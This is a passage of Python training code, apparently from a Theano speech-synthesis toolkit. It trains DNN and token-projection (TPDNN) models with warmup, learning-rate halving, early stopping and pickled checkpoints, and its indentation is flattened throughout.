logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_all_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## osw -- getting validation error from a forward pass in a single batch
## exhausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] // batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be significant if minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f, time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm, validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
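## Illustrative only (not taken from any shipped recipe): a minimal
## hyper_params dictionary covering the keys train_DNN() reads for a TPDNN
## run. Every value below is a hypothetical placeholder, not a recommendation.
example_tpdnn_hyper_params = {
    'model_type': 'TPDNN',
    'learning_rate': 0.002, 'training_epochs': 25, 'warmup_epoch': 10,
    'batch_size': 256, 'early_stop_epochs': 5,
    'momentum': 0.9, 'warmup_momentum': 0.3,
    'l1_reg': 0.0, 'l2_reg': 1e-5, 'private_l2_reg': 1e-5,
    'hidden_layers_sizes': [1024, 1024, 1024],
    'hidden_activation': 'tanh', 'output_activation': 'linear',
    'stream_weights': [1.0], 'stream_lr_weights': [1.0],
    'private_hidden_sizes': [1024], 'use_private_hidden': False,
    'index_to_project': 0, 'projection_insize': 20000, 'projection_outsize': 10,
    'do_pretraining': False, 'pretraining_epochs': 10, 'pretraining_lr': 0.0001,
    'initial_projection_distrib': 'gaussian',
}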
## Function for training the whole model on train data while simultaneously
## inferring projection weights on dev data.
# in each epoch do:
# train_all_fn()
# infer_projections_fn() ## <-- updates proj for devset and gives validation loss
def train_DNN_and_traindev_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the summation of multi-stream outputs does not equal %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help much; if that is the case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
##temporarily we use the training set as pretrain_set_x.
##we need to support arbitrary data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all the model support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same. reserved to compute multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
elif model_type == 'SDAE':
##basic model is ready.
##if the corruption level is set to zero, it becomes a normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converge fast in finetuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] // batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent %.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
##dnn_model.zero_projection_weights()
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] // batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_all_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## infer validation weights before getting validation error:
## osw -- inferring word reps on validation set in a forward pass in a single batch
## exhausts memory when using 20k projected vocab -- also use minibatches
logger.debug('infer word representations for validation set')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] // batch_size
for minibatch_index in range(n_valid_batches):
v_loss = infer_projections_fn(minibatch_index, current_finetune_lr, current_momentum)
valid_error.append(v_loss)
## this function also give us validation loss:
this_validation_loss = numpy.mean(valid_error)
'''
## osw -- getting validation error from a forward pass in a single batch
## exhausts memory when using 20k projected vocab -- also use minibatches
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] / batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
'''
# this has a possible bias if the minibatches were not all of identical size
# but it should not be significant if the minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f, time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model ## note: 'dbn' appears vestigial -- the best model is kept in best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
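## --------------------------------------------------------------------------
## The TPDNN recipe below is split into three phases, run in order by
## main_function when cfg.scheme == 'stagwise':
##   1. train_basic_DNN            -- BASIC phase: projection weights zeroed,
##      train the non-projection part of the network
##   2. train_DNN_with_projections -- TOKEN phase: train only the projection
##      (word/token representation) weights
##   3. infer_projections          -- INFERENCE phase: infer representations
##      for held-out (dev) tokens with the rest of the network fixed
## --------------------------------------------------------------------------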
## Function for training the non-projection part only
def train_basic_DNN(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
# get loggers for this function
# this one writes to both console and file
logger = logging.getLogger("main.train_DNN")
logger.debug('Starting train_DNN')
if plot:
# this one takes care of plotting duties
plotlogger = logging.getLogger("plotting")
# create an (empty) plot of training convergence, ready to receive data points
logger.create_plot('training convergence',MultipleSeriesPlot)
try:
assert numpy.sum(ms_outs) == n_outs
except AssertionError:
logger.critical('the sum of the multi-stream outputs does not equal %d' %(n_outs))
raise
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
## use a switch to turn on pretraining
## pretraining may not help much; in that case, we turn it off to save time
do_pretraining = hyper_params['do_pretraining']
pretraining_epochs = int(hyper_params['pretraining_epochs'])
pretraining_lr = float(hyper_params['pretraining_lr'])
initial_projection_distrib = hyper_params['initial_projection_distrib']
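## round the buffer down to a whole number of minibatches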
buffer_size = int(buffer_size / batch_size) * batch_size
###################
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
## temporarily we use the training set as pretrain_set_x;
## eventually we should support arbitrary data for pretraining
pretrain_set_x = train_set_x
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
dnn_model = None
pretrain_fn = None ## not all models support pretraining right now
train_fn = None
valid_fn = None
valid_model = None ## valid_fn and valid_model are the same; reserved to compute multi-stream distortion
if model_type == 'DNN':
dnn_model = DNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'TPDNN':
dnn_model = TokenProjectionDNN(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
hidden_activation = hidden_activation,
output_activation = output_activation,
projection_insize=projection_insize, projection_outsize=projection_outsize,
expand_by_minibatch=expand_by_minibatch, initial_projection_distrib=initial_projection_distrib)
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
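## the TPDNN returns several finetuning functions; judging by their names and
## their use below: train_all_fn updates all weights, train_subword_fn freezes
## the projection, train_word_fn updates only the projection, and
## infer_projections_fn optimises projections for held-out data, while
## valid_fn / valid_score_i score the validation set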
elif model_type == 'SDAE':
## basic model is ready.
## if the corruption level is set to zero, it becomes a normal autoencoder
dnn_model = StackedDenoiseAutoEncoder(numpy_rng=numpy_rng, n_ins=n_ins, n_outs = n_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes)
if do_pretraining:
pretraining_fn = dnn_model.pretraining_functions(pretrain_set_x, batch_size)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y), batch_size=batch_size)
elif model_type == 'MSDNN': ##model is ready, but the hyper-parameters are not optimised.
dnn_model = MultiStreamDNN(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
elif model_type == 'MSDNN_GV': ## not fully ready
dnn_model = MultiStreamDNNGv(numpy_rng=numpy_rng, n_ins=n_ins, ms_outs=ms_outs,
l1_reg = l1_reg, l2_reg = l2_reg,
hidden_layers_sizes = hidden_layers_sizes,
stream_weights = stream_weights,
hidden_activation = hidden_activation,
output_activation = output_activation)
train_fn, valid_fn = dnn_model.build_finetune_functions(
(train_set_x, train_set_y), (valid_set_x, valid_set_y),
batch_size=batch_size, lr_weights = stream_lr_weights)
else:
logger.critical('%s type NN model is not supported!' %(model_type))
raise Exception('%s type NN model is not supported!' %(model_type))
## if pretraining is supported in one model, add the switch here
## be careful to use autoencoder for pretraining here:
## for SDAE, currently only sigmoid function is supported in the hidden layers, as our input is scaled to [0, 1]
## however, tanh works better and converges faster in fine-tuning
##
## Will extend this soon...
if do_pretraining and model_type == 'SDAE':
logger.info('pretraining the %s model' %(model_type))
corruption_level = 0.0
## in SDAE we do layer-wise pretraining using autoencoders
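## each layer is trained as a denoising autoencoder on the output of the layer
## below; with corruption_level = 0.0 this reduces to a plain autoencoder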
for i in range(dnn_model.n_layers):
for epoch in range(pretraining_epochs):
sub_start_time = time.clock()
pretrain_loss = []
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_y = train_data_reader.load_next_partition()
pretrain_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
n_train_batches = pretrain_set_x.get_value().shape[0] // batch_size
for batch_index in range(n_train_batches):
pretrain_loss.append(pretraining_fn[i](index=batch_index,
corruption=corruption_level,
learning_rate=pretraining_lr))
sub_end_time = time.clock()
logger.info('Pre-training layer %i, epoch %d, cost %s, time spent %.2f' % (i+1, epoch+1, numpy.mean(pretrain_loss), (sub_end_time - sub_start_time)))
train_data_reader.reset()
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
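## BASIC phase: zero the projection weights so the non-projection part of the
## network is trained first, independently of any token representation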
dnn_model.zero_projection_weights()
while (epoch < training_epochs):
epoch = epoch + 1
current_momentum = momentum
current_finetune_lr = finetune_lr
if epoch <= warmup_epoch:
current_finetune_lr = finetune_lr
current_momentum = warmup_momentum
else:
current_finetune_lr = previous_finetune_lr * 0.5
previous_finetune_lr = current_finetune_lr
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] // batch_size
logger.debug('this partition: %d frames (divided into %d batches of size %d)' %(train_set_x.get_value(borrow=True).shape[0], n_train_batches, batch_size) )
for minibatch_index in range(n_train_batches):
this_train_error = train_subword_fn(minibatch_index, current_finetune_lr, current_momentum)
train_error.append(this_train_error)
if numpy.isnan(this_train_error):
logger.warning('training error over minibatch %d of %d was %s' % (minibatch_index+1,n_train_batches,this_train_error) )
train_data_reader.reset()
## osw -- getting validation error from a forward pass in a single batch
## exhausts memory when using a 20k projected vocab -- so use minibatches here too
logger.debug('calculating validation loss')
valid_error = []
n_valid_batches = valid_set_x.get_value().shape[0] // batch_size
for minibatch_index in range(n_valid_batches):
v_loss = valid_score_i(minibatch_index)
valid_error.append(v_loss)
this_validation_loss = numpy.mean(valid_error)
# this has a possible bias if the minibatches were not all of identical size
# but it should not be significant if the minibatches are small
this_train_valid_loss = numpy.mean(train_error)
sub_end_time = time.clock()
loss_difference = this_validation_loss - previous_loss
logger.info('BASIC epoch %i, validation error %f, train error %f, time spent %.2f' %(epoch, this_validation_loss, this_train_valid_loss, (sub_end_time - sub_start_time)))
if plot:
plotlogger.add_plot_point('training convergence','validation set',(epoch,this_validation_loss))
plotlogger.add_plot_point('training convergence','training set',(epoch,this_train_valid_loss))
plotlogger.save_plot('training convergence',title='Progress of training and validation error',xlabel='epochs',ylabel='error')
if this_validation_loss < best_validation_loss:
best_dnn_model = dnn_model
best_validation_loss = this_validation_loss
logger.debug('validation loss decreased, so saving model')
early_stop = 0
else:
logger.debug('validation loss did not improve')
dbn = best_dnn_model ## note: 'dbn' appears vestigial -- the best model is kept in best_dnn_model
early_stop += 1
if early_stop > early_stop_epoch:
# too many consecutive epochs without surpassing the best model
logger.debug('stopping early')
break
if math.isnan(this_validation_loss):
break
previous_loss = this_validation_loss
### Save projection values:
if cfg.hyper_params['model_type'] == 'TPDNN':
if not os.path.isdir(cfg.projection_weights_output_dir):
os.mkdir(cfg.projection_weights_output_dir)
weights = dnn_model.get_projection_weights()
fname = os.path.join(cfg.projection_weights_output_dir, 'proj_BASIC_epoch_%s'%(epoch))
numpy.savetxt(fname, weights)
end_time = time.clock()
pickle.dump(best_dnn_model, open(nnets_file_name, 'wb'))
logger.info('overall training time: %.2fm validation error %f' % ((end_time - start_time) / 60., best_validation_loss))
if plot:
plotlogger.save_plot('training convergence',title='Final training and validation error',xlabel='epochs',ylabel='error')
### ========== now train the word residual ============
def train_DNN_with_projections(train_xy_file_list, valid_xy_file_list, \
nnets_file_name, n_ins, n_outs, ms_outs, hyper_params, buffer_size, plot=False):
####parameters#####
finetune_lr = float(hyper_params['learning_rate'])
training_epochs = int(hyper_params['training_epochs'])
batch_size = int(hyper_params['batch_size'])
l1_reg = float(hyper_params['l1_reg'])
l2_reg = float(hyper_params['l2_reg'])
private_l2_reg = float(hyper_params['private_l2_reg'])
warmup_epoch = int(hyper_params['warmup_epoch'])
momentum = float(hyper_params['momentum'])
warmup_momentum = float(hyper_params['warmup_momentum'])
hidden_layers_sizes = hyper_params['hidden_layers_sizes']
stream_weights = hyper_params['stream_weights']
private_hidden_sizes = hyper_params['private_hidden_sizes']
buffer_utt_size = buffer_size
early_stop_epoch = int(hyper_params['early_stop_epochs'])
hidden_activation = hyper_params['hidden_activation']
output_activation = hyper_params['output_activation']
stream_lr_weights = hyper_params['stream_lr_weights']
use_private_hidden = hyper_params['use_private_hidden']
model_type = hyper_params['model_type']
index_to_project = hyper_params['index_to_project']
projection_insize = hyper_params['projection_insize']
projection_outsize = hyper_params['projection_outsize']
######### data providers ##########
(train_x_file_list, train_y_file_list) = train_xy_file_list
(valid_x_file_list, valid_y_file_list) = valid_xy_file_list
logger.debug('Creating training data provider')
train_data_reader = ListDataProviderWithProjectionIndex(x_file_list = train_x_file_list, y_file_list = train_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = True, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
logger.debug('Creating validation data provider')
valid_data_reader = ListDataProviderWithProjectionIndex(x_file_list = valid_x_file_list, y_file_list = valid_y_file_list, n_ins = n_ins, n_outs = n_outs, buffer_size = buffer_size, shuffle = False, index_to_project=index_to_project, projection_insize=projection_insize, indexes_only=expand_by_minibatch)
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x, train_set_x_proj, train_set_y = shared_train_set_xy
shared_valid_set_xy, temp_valid_set_x, temp_valid_set_x_proj, temp_valid_set_y = valid_data_reader.load_next_partition_with_projection()
valid_set_x, valid_set_x_proj, valid_set_y = shared_valid_set_xy
train_data_reader.reset()
valid_data_reader.reset()
####################################
# numpy random generator
numpy_rng = numpy.random.RandomState(123)
logger.info('building the model')
############## load existing dnn #####
dnn_model = pickle.load(open(nnets_file_name, 'rb'))
train_all_fn, train_subword_fn, train_word_fn, infer_projections_fn, valid_fn, valid_score_i = \
dnn_model.build_finetune_functions(
(train_set_x, train_set_x_proj, train_set_y),
(valid_set_x, valid_set_x_proj, valid_set_y), batch_size=batch_size)
####################################
logger.info('fine-tuning the %s model' %(model_type))
start_time = time.clock()
best_dnn_model = dnn_model
best_validation_loss = sys.float_info.max
previous_loss = sys.float_info.max
early_stop = 0
epoch = 0
previous_finetune_lr = finetune_lr
dnn_model.initialise_projection_weights()
all_epochs = 20 ## 100 ## <-------- hard coded !!!!!!!!!!
current_finetune_lr = previous_finetune_lr = finetune_lr
warmup_epoch_2 = 10 # 10 ## <-------- hard coded !!!!!!!!!!
while (epoch < all_epochs):
epoch = epoch + 1
current_momentum = momentum
if epoch > warmup_epoch_2:
previous_finetune_lr = current_finetune_lr
current_finetune_lr = previous_finetune_lr * 0.5
train_error = []
sub_start_time = time.clock()
while (not train_data_reader.is_finish()):
shared_train_set_xy, temp_train_set_x, temp_train_set_x_proj, temp_train_set_y = train_data_reader.load_next_partition_with_projection()
train_set_x.set_value(numpy.asarray(temp_train_set_x, dtype=theano.config.floatX), borrow=True)
train_set_x_proj.set_value(numpy.asarray(temp_train_set_x_proj, dtype=proj_type), borrow=True)
train_set_y.set_value(numpy.asarray(temp_train_set_y, dtype=theano.config.floatX), borrow=True)
n_train_batches = train_set_x.get_value().shape[0] // batch_size
